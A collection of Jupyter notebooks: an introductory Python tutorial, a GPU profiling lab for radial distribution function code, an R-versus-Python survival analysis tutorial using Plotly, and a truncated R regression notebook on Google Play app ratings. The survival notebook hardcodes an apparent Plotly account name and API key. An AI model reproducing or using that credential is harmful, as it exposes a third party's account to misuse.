(Test)") plt.legend(loc="upper right") plt.show() ```
github_jupyter
# Python and Data Science Python is open source, interpreted, high level language and provides great approach for object-oriented programming. It is one of the best language used by data scientist for various data science projects/application. Python provide great functionality to deal with mathematics, statistics and scientific function. It provides great libraries to deals with data science application. One of the main reasons why Python is widely used in the scientific and research communities is because of its ease of use and simple syntax which makes it easy to adapt for people who do not have an engineering background. It is also more suited for quick prototyping. ![](https://www.brsoftech.com/blog/wp-content/uploads/2019/11/most-in-demand-programming-languages-2020.png) # Is Python a New Language? Python was first released in 1991. It was created by Guido van Rossum as a hobby project. It was named after a comedy TV series. ![Monty Python](https://upload.wikimedia.org/wikipedia/en/c/cd/Monty_Python%27s_Flying_Circus_Title_Card.png) # Computing for Everybody As python was becoming popular, Van Rossum submitted a funding proposal to DARPA called "Computer Programming for Everybody", in which he further defined his goals for Python: - An easy and intuitive language just as powerful as major competitors - Open source, so anyone can contribute to its development - Code that is as understandable as plain English - Suitability for everyday tasks, allowing for short development times > In 2021, Python was the second most popular language on GitHub, a social coding website, behind JavaScript and was the most popular language in the last quarter of the year. According to a programming language popularity survey it is consistently among the top 10 most mentioned languages in job postings. Furthermore, Python has been among the 10 most popular programming languages every year since 2004 according to the TIOBE Programming Community Index. # The Zen of Python The Zen of Python is a collection of 19 "guiding principles" for writing computer programs that influence the design of the Python programming language. Software engineer Tim Peters wrote this set of principles and posted it on the Python mailing list in 1999. Peters's list left open a 20th principle "for Guido to fill in", referring to Guido van Rossum, the original author of the Python language. The vacancy for a 20th principle has not been filled. - Beautiful is better than ugly. - Explicit is better than implicit. - Simple is better than complex. - Complex is better than complicated. - Flat is better than nested. - Sparse is better than dense. - Readability counts. - Special cases aren't special enough to break the rules. - Although practicality beats purity. - Errors should never pass silently. - Unless explicitly silenced. - In the face of ambiguity, refuse the temptation to guess. - There should be one—and preferably only one—obvious way to do it. - Although that way may not be obvious at first unless you're Dutch. - Now is better than never. - Although never is often better than right now. - If the implementation is hard to explain, it's a bad idea. - If the implementation is easy to explain, it may be a good idea. - Namespaces are one honking great idea—let's do more of those! # Try Python Now Select the following code block. Click Cell Menu (on the top) > Run Cells. You can also press Ctrl+Enter. ``` print ("This is Python!") ``` But this isn't fun right? The following block creates two variables and put numbers in them, and then compares which number is larger. Feel free to play around and change the numbers and see how it affects the results. ``` a = 10 b = 15 if b > a: print("B is greater") elif a > b: print ("A is greater") else: print ("Both are same") ``` The following block creates a list of three fruit names (saved as String). Then we loop over all the fruit names and print a sentence. ``` fruits = ["Apple", "Banana", "Mango"] for fruit in fruits: print ("I eat "+fruit) ``` # What is Anaconda? Anaconda is a free and open-source distribution of the Python and R programming languages for scientific computing (data science, machine learning applications, large-scale data processing, predictive analytics, etc.), that aims to simplify package management and deployment. There are several alternatives, however Anaconda is the most popular due to simplicity of managing the python components. Jupyter Notebook (formerly IPython Notebooks) is a web-based interactive computational environment for creating Jupyter notebook documents. The "notebook" term can colloquially make reference to many different entities, mainly the Jupyter web application, Jupyter Python web server, or Jupyter document format. # Markdown Hello this is a text. This is not python code. This will not run. But this will be displayed properly. # This is a heading ## This is a smaller heading ### This is an even smaller heading If you see hash (#) symbol in the beginning of each heading, you are currently in the edit mode. If you don't, double click this text and edit something. Click Run Cell (or Ctrl+Enter) again to update it. Remember you'll need to save the file to preserve the changes. psst... sometimes anaconda may save automatically. Here're the reasons why you should use markdown cells: 1. It makes your notes look better 1. It helps other programmers understand what you are doing # More Python Create a new block below. Click on Insert Menu > Insert Cell below. You can also use the shortcut key. In that cell, write 10+20 and verify that the output is correct. Did you create a new block above this cell? If you didn't, you can still do it by pressing ESCAPE key to go to the command mode of Jupyter, and press 'A' key to create. You can do all the basic arithmetic or logical operations on number literals or variables. Play around with the following code block. ``` 20/3 20%3 ``` The % operator is called **modulus** operator, which will divide the first number by the second number and return the *reminder* as output. > Some of you might know it already In Python, we can write a print statement like: `print ("Hello Julia")` and it should get printed. # Table in Markdown | Sno | Student Name | | --- | ------------ | | 1 | Narender | ``` | Sno | Student Name | | --- | ------------ | | 1 | Narender | ``` You can double click this cell to see the actual raw syntax behind the fancy formatting. # Comments in Python Comments are used to explain the code, make notes to help other programmers, or make notes for future scope. They are mostly used to make code readable. ``` # This is a comment print ("Hello World!") # This is a string statement print (5+9) # This is a number print ('The end!') # Bye ``` # Errors in Python If something went wrong, python gives a detailed description of what went wrong. **NameError** is raised when a local or global name is not found. The associated value is an error message that includes the name that could not be found. In simple words, Python interpreter doesn't understand what a particular word you used means. One of the most common causes for this kind of error are misspelling or not initializing or importing the mentioned object. The following block shows an error that tells you the line that caused the error, and an error message that explains the error. Can you fix it? ``` myname = "Jones" print ("Hello "+mynaam) ``` # Importing Libraries Anaconda is a suite of tools you need to build modern software and data science projects. These tools and features are packed in *packages* that you need to *import* before you can use them in your code. Run the following block. It's a joke feature added in python. It will open another browser tab containing a comic about how powerful Python is. ``` import antigravity ``` ## Testing Required Packages We should see if the packages we need for this course are ready to be used. The following code should run without errors. ### ModuleNotFoundError If you see an error that looks like the following, the mentioned module or package is not present in your python environment. ``` ----> 1 import pandas as pd 2 import numpy as np 3 import matplotlib.pyplot as plt 4 5 np.random.seed(0) ModuleNotFoundError: No module named 'pandas' ``` If you see an error like this, you can install it by visiting Package Manager in the *Anaconda Navigator*. You can also install it by adding a code block below and typing `%pip install pandas`. If some other package caused this issue, you can replace its name instead. The output should say `Successfully installed pandas`. If everything went right, you should be able to see a chart showing a normal distribution. ``` %pip install matplotlib import pandas as pd import numpy as np import matplotlib.pyplot as plt np.random.seed(0) values = np.random.randn(100) s = pd.Series(values) s.plot(kind='hist', title='Normally distributed random values') plt.show() ``` Verifying if scikit-learn package is working fine. Run the following block. If you see a ModuleNotFoundError, you can install it using `%pip install scikit-learn`. ``` import sklearn ``` # A Fun Mini-Game Run the following block to play a short game in which you have to guess a number. The first block imports the required package and creates an empty list of winners. The second block runs the game. You can play as often as you like. Play around and make changes in the code. This code block also introduces some more basics of Python programming. If something breaks, you can still look at the git and copy the correct code. ``` import random score_history = [] secret_number = random.randint(1,100) count = 0 playername = input("What's your name?") gamewon = True print ("Welcome "+playername+". In this game, you will guess a number between 1 to 100. I will give you hints. Let's see how you perform") while True: guess = int (input("Enter your Guess: ")) count += 1 if guess == secret_number: print ("You win the game") break else: if guess < secret_number: print ("No. Try a higher number") if guess > secret_number: print ("No. Try a lower number") if count>11: print ("Sorry. I can't give you more tries. You lost.") gamewon = False break score = 11-count if gamewon: print ("Congratulations.. your score is {}".format(11-count)) score_history.append(playername+"\t"+str(score)) print () print ('\n') print (" = = = = = = Hall of Fame = = = = = = ") for row in score_history: print (row) ```
github_jupyter
## RDF The radial distribution function (RDF) denoted in equations by g(r) defines the probability of finding a particle at a distance r from another tagged particle. The RDF is strongly dependent on the type of matter so will vary greatly for solids, gases and liquids. <img src="../images/rdf.png" width="60%" height="60%"> As you might have observed the code complexity of the algorithm in $N^{2}$ . Let us get into details of the sequential code. **Understand and analyze** the code present at: [RDF Serial Code](../../source_code/serial/rdf.cpp) [File Reader](../../source_code/serial/dcdread.h) [Makefile](../../source_code/serial/Makefile) Open the downloaded file for inspection. ``` !cd ../../source_code/serial && make clean && make ``` We plan to follow the typical optimization cycle that every code needs to go through <img src="../images/workflow.png" width="70%" height="70%"> In order analyze the application we we will make use of profiler "nsys" and add "nvtx" marking into the code to get more information out of the serial code. Before running the below cells, let's first start by divining into the profiler lab to learn more about the tools. Using Profiler gives us the hotspots and helps to understand which function is important to be made parallel. ----- # <div style="text-align: center ;border:3px; border-style:solid; border-color:#FF0000 ; padding: 1em">[Profiling lab](../../../../../profiler/English/jupyter_notebook/nsight_systems.ipynb)</div> ----- Now, that we are familiar with the Nsight Profiler and know how to [NVTX](../../../../../profiler/English/jupyter_notebook/nsight_systems.ipynb#nvtx), let's profile the serial code and checkout the output. ``` !cd ../../source_code/serial&& nsys profile -t nvtx --stats=true --force-overwrite true -o rdf_serial ./rdf ``` Once you run the above cell, you should see the following in the terminal. <img src="../images/serial.png" width="70%" height="70%"> To view the profiler report, you would need to [Download the profiler output](../../source_code/serial/rdf_serial.qdrep) and open it via the GUI. For more information on how to open the report via the GUI, please checkout the section on [How to view the report](../../../../../profiler/English/jupyter_notebook/profiling-c.ipynb#gui-report). From the timeline view, right click on the nvtx row and click the "show in events view". Now you can see the nvtx statistic at the bottom of the window which shows the duration of each range. In the following labs, we will look in to the profiler report in more detail. <img src="../images/nvtx_serial.png" width="100%" height="100%"> The obvious next step is to make **Pair Calculation** algorithm parallel using different approaches to GPU Programming. Please follow the below link and choose one of the approaches to parallelise th serial code. ----- # <div style="text-align: center ;border:3px; border-style:solid; border-color:#FF0000 ; padding: 1em">[HOME](../../../nways_MD_start.ipynb)</div> ----- # Links and Resources <!--[OpenACC API guide](https://www.openacc.org/sites/default/files/inline-files/OpenACC%20API%202.6%20Reference%20Guide.pdf)--> [NVIDIA Nsight System](https://docs.nvidia.com/nsight-systems/) <!--[NVIDIA Nsight Compute](https://developer.nvidia.com/nsight-compute)--> <!--[CUDA Toolkit Download](https://developer.nvidia.com/cuda-downloads)--> [Profiling timelines with NVTX](https://devblogs.nvidia.com/cuda-pro-tip-generate-custom-application-profile-timelines-nvtx/) **NOTE**: To be able to see the Nsight System profiler output, please download Nsight System latest version from [here](https://developer.nvidia.com/nsight-systems). Don't forget to check out additional [OpenACC Resources](https://www.openacc.org/resources) and join our [OpenACC Slack Channel](https://www.openacc.org/community#slack) to share your experience and get more help from the community. --- ## Licensing This material is released by OpenACC-Standard.org, in collaboration with NVIDIA Corporation, under the Creative Commons Attribution 4.0 International (CC BY 4.0).
github_jupyter
In this notebook, we introduce survival analysis and we show application examples using both R and Python. We will compare the two programming languages, and leverage Plotly's Python and R APIs to convert static graphics into interactive `plotly` objects. [Plotly](https://plotly.com) is a platform for making interactive graphs with R, Python, MATLAB, and Excel. You can make graphs and analyze data on Plotly’s free public cloud. For collaboration and sensitive data, you can run Plotly [on your own servers](https://plotly.com/product/enterprise/). For a more in-depth theoretical background in survival analysis, please refer to these sources: - [Lecture Notes by John Fox](http://socserv.mcmaster.ca/jfox/Courses/soc761/survival-analysis.pdf) - [Wikipedia article](http://en.wikipedia.org/wiki/Survival_analysis) - [Presentation by Kristin Sainani](www.pitt.edu/~super4/33011-34001/33051-33061.ppt) - [Lecture Notes by Germán Rodríguez](http://data.princeton.edu/wws509/notes/c7.pdf) Need help converting Plotly graphs from R or Python? - [R](https://plotly.com/r/user-guide/) - [Python](https://plotly.com/python/matplotlib-to-plotly-tutorial/) For this code to run on your machine, you will need several R and Python packages installed. - Running `sudo pip install <package_name>` from your terminal will install a Python package. - Running `install.packages("<package_name>")` in your R console will install an R package. You will also need to create an account with [Plotly](https://plotly.com/feed/) to receive your API key. ``` # You can also install packages from within IPython! # Install Python Packages !pip install lifelines !pip install rpy2 !pip install plotly !pip install pandas # Load extension that let us use magic function `%R` %load_ext rpy2.ipython # Install R packages %R install.packages("devtools") %R devtools::install_github("ropensci/plotly") %R install.packages("OIsurv") ``` ## Introduction [Survival analysis](http://en.wikipedia.org/wiki/Survival_analysis) is a set of statistical methods for analyzing the occurrence of events over time. It is also used to determine the relationship of co-variates to the time-to-events, and accurately compare time-to-event between two or more groups. For example: - Time to death in biological systems. - Failure time in mechanical systems. - How long can we expect a user to be on a website / service? - Time to recovery for lung cancer treatment. The statistical term 'survival analysis' is analogous to 'reliability theory' in engineering, 'duration analysis' in economics, and 'event history analysis' in sociology. The two key functions in survival analysis are the *survival function* and the *hazard function*. The **survival function**, conventionally denoted by $S$, is the probability that the event (say, death) has not occurred yet: $$S(t) = Pr(T > t),$$ where $T$ denotes the time of death and $Pr$ the probability. Since $S$ is a probability, $0\leq S(t)\leq1$. Survival times are non-negative ($T \geq 0$) and, generally, $S(0) = 1$. The **hazard function** $h(t)$ is the event (death) rate at time $t$, conditional on survival until $t$ (i.e., $T \geq t$): \begin{align*} h(t) &= \lim_{\Delta t \to 0} Pr(t \leq T \leq t + \Delta t \, | \, T \geq t) \\ &= \lim_{\Delta t \to 0} \frac{Pr(t \leq T \leq t + \Delta t)}{S(t)} = \frac{p(t)}{S(t)}, \end{align*} where $p$ denotes the probability density function. In practice, we do not get to observe the actual survival function of a population; we must use the observed data to estimate it. A popular estimate for the survival function $S(t)$ is the [Kaplan–Meier estimate](http://en.wikipedia.org/wiki/Kaplan–Meier_estimator): \begin{align*} \hat{S}(t) &= \prod_{t_i \leq t} \frac{n_i − d_i}{n_i}\,, \end{align*} where $d_i$ is the number of events (deaths) observed at time $t_i$ and $n_i$ is the number of subjects at risk observed at time $t_i$. ## Censoring Censoring is a type of missing data problem common in survival analysis. Other popular comparison methods, such as linear regression and t-tests do not accommodate for censoring. This makes survival analysis attractive for data from randomized clinical studies. In an ideal scenario, both the birth and death rates of a patient is known, which means the lifetime is known. **Right censoring** occurs when the 'death' is unknown, but it is after some known date. e.g. The 'death' occurs after the end of the study, or there was no follow-up with the patient. **Left censoring** occurs when the lifetime is known to be less than a certain duration. e.g. Unknown time of initial infection exposure when first meeting with a patient. <hr> For following analysis, we will use the [lifelines](https://github.com/CamDavidsonPilon/lifelines) library for python, and the [survival](http://cran.r-project.org/web/packages/survival/survival.pdf) package for R. We can use [rpy2](http://rpy.sourceforge.net) to execute R code in the same document as the python code. ``` # OIserve contains the survival package and sample datasets %R library(OIsurv) %R library(devtools) %R library(plotly) %R library(IRdisplay) # Authenticate to plotly's api using your account %R py <- plotly("rmdk", "0sn825k4r8") # Load python libraries import numpy as np import pandas as pd import lifelines as ll # Plotting helpers from IPython.display import HTML %matplotlib inline import matplotlib.pyplot as plt import plotly.plotly as py import plotly.tools as tls from plotly.graph_objs import * from pylab import rcParams rcParams['figure.figsize']=10, 5 ``` ## Loading data into Python and R We will be using the `tongue` dataset from the `KMsurv` package in R, then convert the data into a pandas dataframe under the same name. This data frame contains the following columns: - type: Tumor DNA profile (1=Aneuploid Tumor, 2=Diploid Tumor) - time: Time to death or on-study time, weeks - delta Death indicator (0=alive, 1=dead) ``` # Load in data %R data(tongue) # Pull data into python kernel %Rpull tongue # Convert into pandas dataframe from rpy2.robjects import pandas2ri tongue = pandas2ri.ri2py_dataframe(tongue) ``` We can now refer to `tongue` using both R and python. ``` %%R summary(tongue) tongue.describe() ``` We can even operate on R and Python within the same code cell. ``` %R print(mean(tongue$time)) print tongue['time'].mean() ``` In R we need to create a `Surv` object with the `Surv()` function. Most functions in the `survival` package apply methods to this object. For right-censored data, we need to pass two arguments to `Surv()`: 1. a vector of times 2. a vector indicating which times are observed and censored ``` %%R attach(tongue) tongue.surv <- Surv(time[type==1], delta[type==1]) tongue.surv ``` - The plus-signs identify observations that are right-censored. # Estimating survival with Kaplan-Meier ### Using R The simplest fit estimates a survival object against an intercept. However, the `survfit()` function has several optional arguments. For example, we can change the confidence interval using `conf.int` and `conf.type`. See `help(survfit.formula)` for the comprehensive documentation. ``` %%R surv.fit <- survfit(tongue.surv~1) surv.fit ``` It is often helpful to call the `summary()` and `plot()` functions on this object. ``` %%R summary(surv.fit) %%R -h 400 plot(surv.fit, main='Kaplan-Meier estimate with 95% confidence bounds', xlab='time', ylab='survival function') ``` Let's convert this plot into an interactive plotly object using [plotly](https://plotly.com) and [ggplot2](http://ggplot2.org). First, we will use a helper ggplot function written by [Edwin Thoen](http://www.r-statistics.com/2013/07/creating-good-looking-survival-curves-the-ggsurv-function/) to plot pretty survival distributions in R. ``` %%R ggsurv <- function(s, CI = 'def', plot.cens = T, surv.col = 'gg.def', cens.col = 'red', lty.est = 1, lty.ci = 2, cens.shape = 3, back.white = F, xlab = 'Time', ylab = 'Survival', main = ''){ library(ggplot2) strata <- ifelse(is.null(s$strata) ==T, 1, length(s$strata)) stopifnot(length(surv.col) == 1 | length(surv.col) == strata) stopifnot(length(lty.est) == 1 | length(lty.est) == strata) ggsurv.s <- function(s, CI = 'def', plot.cens = T, surv.col = 'gg.def', cens.col = 'red', lty.est = 1, lty.ci = 2, cens.shape = 3, back.white = F, xlab = 'Time', ylab = 'Survival', main = ''){ dat <- data.frame(time = c(0, s$time), surv = c(1, s$surv), up = c(1, s$upper), low = c(1, s$lower), cens = c(0, s$n.censor)) dat.cens <- subset(dat, cens != 0) col <- ifelse(surv.col == 'gg.def', 'black', surv.col) pl <- ggplot(dat, aes(x = time, y = surv)) + xlab(xlab) + ylab(ylab) + ggtitle(main) + geom_step(col = col, lty = lty.est) pl <- if(CI == T | CI == 'def') { pl + geom_step(aes(y = up), color = col, lty = lty.ci) + geom_step(aes(y = low), color = col, lty = lty.ci) } else (pl) pl <- if(plot.cens == T & length(dat.cens) > 0){ pl + geom_point(data = dat.cens, aes(y = surv), shape = cens.shape, col = cens.col) } else if (plot.cens == T & length(dat.cens) == 0){ stop ('There are no censored observations') } else(pl) pl <- if(back.white == T) {pl + theme_bw() } else (pl) pl } ggsurv.m <- function(s, CI = 'def', plot.cens = T, surv.col = 'gg.def', cens.col = 'red', lty.est = 1, lty.ci = 2, cens.shape = 3, back.white = F, xlab = 'Time', ylab = 'Survival', main = '') { n <- s$strata groups <- factor(unlist(strsplit(names (s$strata), '='))[seq(2, 2*strata, by = 2)]) gr.name <- unlist(strsplit(names(s$strata), '='))[1] gr.df <- vector('list', strata) ind <- vector('list', strata) n.ind <- c(0,n); n.ind <- cumsum(n.ind) for(i in 1:strata) ind[[i]] <- (n.ind[i]+1):n.ind[i+1] for(i in 1:strata){ gr.df[[i]] <- data.frame( time = c(0, s$time[ ind[[i]] ]), surv = c(1, s$surv[ ind[[i]] ]), up = c(1, s$upper[ ind[[i]] ]), low = c(1, s$lower[ ind[[i]] ]), cens = c(0, s$n.censor[ ind[[i]] ]), group = rep(groups[i], n[i] + 1)) } dat <- do.call(rbind, gr.df) dat.cens <- subset(dat, cens != 0) pl <- ggplot(dat, aes(x = time, y = surv, group = group)) + xlab(xlab) + ylab(ylab) + ggtitle(main) + geom_step(aes(col = group, lty = group)) col <- if(length(surv.col == 1)){ scale_colour_manual(name = gr.name, values = rep(surv.col, strata)) } else{ scale_colour_manual(name = gr.name, values = surv.col) } pl <- if(surv.col[1] != 'gg.def'){ pl + col } else {pl + scale_colour_discrete(name = gr.name)} line <- if(length(lty.est) == 1){ scale_linetype_manual(name = gr.name, values = rep(lty.est, strata)) } else {scale_linetype_manual(name = gr.name, values = lty.est)} pl <- pl + line pl <- if(CI == T) { if(length(surv.col) > 1 && length(lty.est) > 1){ stop('Either surv.col or lty.est should be of length 1 in order to plot 95% CI with multiple strata') }else if((length(surv.col) > 1 | surv.col == 'gg.def')[1]){ pl + geom_step(aes(y = up, color = group), lty = lty.ci) + geom_step(aes(y = low, color = group), lty = lty.ci) } else{pl + geom_step(aes(y = up, lty = group), col = surv.col) + geom_step(aes(y = low,lty = group), col = surv.col)} } else {pl} pl <- if(plot.cens == T & length(dat.cens) > 0){ pl + geom_point(data = dat.cens, aes(y = surv), shape = cens.shape, col = cens.col) } else if (plot.cens == T & length(dat.cens) == 0){ stop ('There are no censored observations') } else(pl) pl <- if(back.white == T) {pl + theme_bw() } else (pl) pl } pl <- if(strata == 1) {ggsurv.s(s, CI , plot.cens, surv.col , cens.col, lty.est, lty.ci, cens.shape, back.white, xlab, ylab, main) } else {ggsurv.m(s, CI, plot.cens, surv.col , cens.col, lty.est, lty.ci, cens.shape, back.white, xlab, ylab, main)} pl } ``` Voila! ``` %%R -h 400 p <- ggsurv(surv.fit) + theme_bw() p ``` We have to use a workaround to render an interactive plotly object by using an iframe in the ipython kernel. This is a bit easier if you are working in an R kernel. ``` %%R # Create the iframe HTML plot.ly <- function(url) { # Set width and height from options or default square w <- "750" h <- "600" html <- paste("<center><iframe height=\"", h, "\" id=\"igraph\" scrolling=\"no\" seamless=\"seamless\"\n\t\t\t\tsrc=\"", url, "\" width=\"", w, "\" frameBorder=\"0\"></iframe></center>", sep="") return(html) } %R p <- plot.ly("https://plotly.com/~rmdk/111/survival-vs-time/") # pass object to python kernel %R -o p # Render HTML HTML(p[0]) ``` The `y axis` represents the probability a patient is still alive at time $t$ weeks. We see a steep drop off within the first 100 weeks, and then observe the curve flattening. The dotted lines represent the 95% confidence intervals. ### Using Python We will now replicate the above steps using python. Above, we have already specified a variable `tongues` that holds the data in a pandas dataframe. ``` from lifelines.estimation import KaplanMeierFitter kmf = KaplanMeierFitter() ``` The method takes the same parameters as it's R counterpart, a time vector and a vector indicating which observations are observed or censored. The model fitting sequence is similar to the [scikit-learn](http://scikit-learn.org/stable/) api. ``` f = tongue.type==1 T = tongue[f]['time'] C = tongue[f]['delta'] kmf.fit(T, event_observed=C) ``` To get a plot with the confidence intervals, we simply can call `plot()` on our `kmf` object. ``` kmf.plot(title='Tumor DNA Profile 1') ``` Now we can convert this plot to an interactive [Plotly](https://plotly.com) object. However, we will have to augment the legend and filled area manually. Once we create a helper function, the process is simple. Please see the Plotly Python [user guide](https://plotly.com/python/overview/#in-%5B37%5D) for more insight on how to update plot parameters. > Don't forget you can also easily edit the chart properties using the Plotly GUI interface by clicking the "Play with this data!" link below the chart. ``` p = kmf.plot(ci_force_lines=True, title='Tumor DNA Profile 1 (95% CI)') # Collect the plot object kmf1 = plt.gcf() def pyplot(fig, ci=True, legend=True): # Convert mpl fig obj to plotly fig obj, resize to plotly's default py_fig = tls.mpl_to_plotly(fig, resize=True) # Add fill property to lower limit line if ci == True: style1 = dict(fill='tonexty') # apply style py_fig['data'][2].update(style1) # Change color scheme to black py_fig['data'].update(dict(line=Line(color='black'))) # change the default line type to 'step' py_fig['data'].update(dict(line=Line(shape='hv'))) # Delete misplaced legend annotations py_fig['layout'].pop('annotations', None) if legend == True: # Add legend, place it at the top right corner of the plot py_fig['layout'].update( showlegend=True, legend=Legend( x=1.05, y=1 ) ) # Send updated figure object to Plotly, show result in notebook return py.iplot(py_fig) pyplot(kmf1, legend=False) ``` <hr> # Multiple Types ### Using R Many times there are different groups contained in a single dataset. These may represent categories such as treatment groups, different species, or different manufacturing techniques. The `type` variable in the `tongues` dataset describes a patients DNA profile. Below we define a Kaplan-Meier estimate for each of these groups in R and Python. ``` %%R surv.fit2 <- survfit( Surv(time, delta) ~ type) p <- ggsurv(surv.fit2) + ggtitle('Lifespans of different tumor DNA profile') + theme_bw() p ``` Convert to a Plotly object. ``` #%R ggplotly(plt) %R p <- plot.ly("https://plotly.com/~rmdk/173/lifespans-of-different-tumor-dna-profile/") # pass object to python kernel %R -o p # Render HTML HTML(p[0]) ``` ### Using Python ``` f2 = tongue.type==2 T2 = tongue[f2]['time'] C2 = tongue[f2]['delta'] ax = plt.subplot(111) kmf.fit(T, event_observed=C, label=['Type 1 DNA']) kmf.survival_function_.plot(ax=ax) kmf.fit(T2, event_observed=C2, label=['Type 2 DNA']) kmf.survival_function_.plot(ax=ax) plt.title('Lifespans of different tumor DNA profile') kmf2 = plt.gcf() ``` Convert to a Plotly object. ``` pyplot(kmf2, ci=False) ``` <hr> # Testing for Difference It looks like DNA Type 2 is potentially more deadly, or more difficult to treat compared to Type 1. However, the difference between these survival curves still does not seem dramatic. It will be useful to perform a statistical test on the different DNA profiles to see if their survival rates are significantly different. Python's *lifelines* contains methods in `lifelines.statistics`, and the R package `survival` uses a function `survdiff()`. Both functions return a p-value from a chi-squared distribution. It turns out these two DNA types do not have significantly different survival rates. ### Using R ``` %%R survdiff(Surv(time, delta) ~ type) ``` ### Using Python ``` from lifelines.statistics import logrank_test summary_= logrank_test(T, T2, C, C2, alpha=99) print summary_ ``` <hr> # Estimating Hazard Rates ### Using R To estimate the hazard function, we compute the cumulative hazard function using the [Nelson-Aalen estimator](), defined as: $$\hat{\Lambda} (t) = \sum_{t_i \leq t} \frac{d_i}{n_i}$$ where $d_i$ is the number of deaths at time $t_i$ and $n_i$ is the number of susceptible individuals. Both R and Python modules use the same estimator. However, in R we will use the `-log` of the Fleming and Harrington estimator, which is equivalent to the Nelson-Aalen. ``` %%R haz <- Surv(time[type==1], delta[type==1]) haz.fit <- summary(survfit(haz ~ 1), type='fh') x <- c(haz.fit$time, 250) y <- c(-log(haz.fit$surv), 1.474) cum.haz <- data.frame(time=x, cumulative.hazard=y) p <- ggplot(cum.haz, aes(time, cumulative.hazard)) + geom_step() + theme_bw() + ggtitle('Nelson-Aalen Estimate') p %R p <- plot.ly("https://plotly.com/~rmdk/185/cumulativehazard-vs-time/") # pass object to python kernel %R -o p # Render HTML HTML(p[0]) ``` ### Using Python ``` from lifelines.estimation import NelsonAalenFitter naf = NelsonAalenFitter() naf.fit(T, event_observed=C) naf.plot(title='Nelson-Aalen Estimate') naf.plot(ci_force_lines=True, title='Nelson-Aalen Estimate') py_p = plt.gcf() pyplot(py_p, legend=False) from IPython.display import display, HTML display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />')) display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">')) ! pip install publisher --upgrade import publisher publisher.publish( 'survival_analysis.ipynb', 'ipython-notebooks/survival-analysis-r-vs-python/', 'Survival Analysis with Plotly: R vs Python', 'An introduction to survival analysis with Plotly graphs using R, Python, and IPython notebooks', name='Survival Analysis with Plotly') ```
github_jupyter
``` library(ggplot2) # ggplot library(ggfortify) # autoplot library(gridExtra) library(dplyr) # select #(a) 수리시간(Minutes) 와 부품의 수(Units) 를 관계시키는 선형 회귀 모형을 적합 setwd('D:/Working/03.Korea/회귀분석/Final-Report/google-play-store-apps') # kaggle 데이터 # $ 환율은 1177.42 gplay_data <- read.csv(file="googleplaystore.csv", header=TRUE, sep=",") gplay_data[1:5,] gplay_data$Category <- as.numeric(as.factor(gplay_data$Category)) # Category 를 수치형으로 변경 gplay_data$Type <- as.numeric(as.factor(gplay_data$Type)) # Type (Free / Paid) 를 수치형으로 변경 gplay_paid_data <- subset(gplay_data, Type == "2") gplay_data[1:5,] gplay_reg = lm(Rating ~ ., gplay_data) summary(gplay_reg) gplay_data <- gplay_data %>% dplyr::select(-Installs, -Price) # 결정 된 항목의 열을 삭제 gplay_reg = lm(Rating ~ ., gplay_data) summary(gplay_reg) gplay_paid_data <- subset(gplay_data, Type == "2") gplay_paid_data[1:5,] gplay_free_data <- subset(gplay_data, Type == "1") gplay_free_data[1:5,] gplay_paid_data <- subset(gplay_paid_data, Last_Updated == "2017") rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) gplay_paid_data[1:5,] gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) gplay_paid_data <- gplay_paid_data[c(-30,-1),] gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data %>% dplyr::select(-Type, -Last_Updated) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-11,-20, -55),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-43, -21, -1),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- 